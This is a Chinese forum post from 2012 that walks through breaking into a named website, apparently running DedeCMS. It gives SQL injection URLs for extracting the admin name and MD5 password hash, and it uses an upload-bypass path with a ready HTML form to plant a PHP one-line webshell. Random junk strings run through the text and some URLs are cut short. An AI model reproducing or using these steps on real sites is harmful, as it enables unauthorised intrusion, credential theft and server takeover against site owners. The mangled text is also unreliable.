①注入漏洞。4 I( i* e- U: e" {- P; N% B* C( q6 [
这站 http://www.political-security.com/
7 M" w8 r: P k首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,, A+ V# S9 ^/ a, I( ?! M2 t
www.political-security.com/data/mysql_error_trace.inc 爆后台( P0 H, A% s6 n( |! d4 \: r
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。 H: L; C! C! e4 y# ?' {
然后写上语句 ' g) T O6 x. R4 X7 X1 D1 e4 n
查看管理员帐号$ C0 `0 `8 b- o( F3 U( J6 ^- G
http://www.political-security.co ... &membergroup=@`
' H0 ^; ~" f1 r' u5 ?9 j% i. c1 p5 J( T8 k& i% P
admin
3 K, r5 k- \' J* l/ }! E
4 p+ y3 C s! M2 Y4 [- c8 H) ~查看管理员密码
1 T: X, F# e. S3 q1 v4 _& H& h http://www.political-security.co ... &membergroup=@`( N, B: ~9 p2 T" q5 S2 D. V6 I
) c" Q2 S v+ @( l' v9 T8d29b1ef9f8c5a5af429& c) o- t6 B! d( C! p( e
" ]" S7 @0 y; k/ s3 N, B m' d查看管理员密码# X$ f6 w3 j) Y @
) ]+ U9 ]5 {$ h0 g" g得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
# p+ @8 `. v. w5 O9 d; h. `8 f" i' |+ o# H) M8 }% `* w
8d2
8 v, k: Z u$ _* y9b1ef9f8c5a5af42
/ F d4 w! G3 U4 c5 G! ?9) a8 \+ k% h9 E2 T- o4 q
/ Z+ W% W' n; d: ?
cmd5没解出来 只好测试第二个方法
% r& U8 G$ J Q. S6 ]. V
/ }+ r" z2 ^+ K) }3 z, [
0 A3 P' S, {, n5 B7 j②上传漏洞:1 M$ r5 |+ e# O; }6 U @
6 K2 R, g4 b5 z, P% ^. i8 ^9 M u
只要登陆会员中心,然后访问页面链接
$ `. s% C& J) p1 c7 l# y( G“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
s) [% z! {- O7 o e3 c4 T! q6 G7 Z' F' ]) z4 r8 v
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
e# w8 S9 p' b. N( P% d* V
& X" Z4 H' S" S# H: K于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
1 r, q6 D) ~5 y) S5 W2 k, B% J! H& O
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>( B' [; A/ Q5 ^. m' m: U9 I7 ^
或者5 U6 `# U) X4 u" t% U: @: [
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对